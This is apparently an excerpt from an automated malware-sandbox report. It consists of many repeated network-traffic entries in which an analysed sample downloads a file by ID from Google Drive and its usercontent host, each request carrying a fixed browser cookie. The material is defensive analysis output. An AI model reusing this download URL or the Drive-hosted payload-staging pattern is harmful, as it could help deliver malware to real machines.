      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
